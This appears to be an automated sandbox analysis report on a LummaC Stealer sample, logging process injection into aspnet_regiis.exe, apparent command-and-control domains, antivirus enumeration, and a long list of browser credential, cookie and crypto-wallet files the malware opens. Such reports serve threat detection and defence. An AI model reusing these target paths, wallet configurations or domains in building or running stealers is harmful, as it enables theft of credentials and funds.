                Source: C:\Users\user\Desktop\Loader.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\Loader.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C30000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C30000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: inherineau.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: scentniej.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Loader.exe, 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: prisonyfork.buzz
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C30000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C31000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C72000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C75000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C83000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C31000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C72000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C75000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C83000Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 30A5008Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4F358 cpuid 0_2_6CE4F358
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4EDDB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CE4EDDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: aspnet_regiis.exe, 00000003.00000002.2243161469.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220755214.0000000005C80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5772, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"WalB
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 20},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"b
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: age.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexR
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: age.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexR
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
                Source: aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
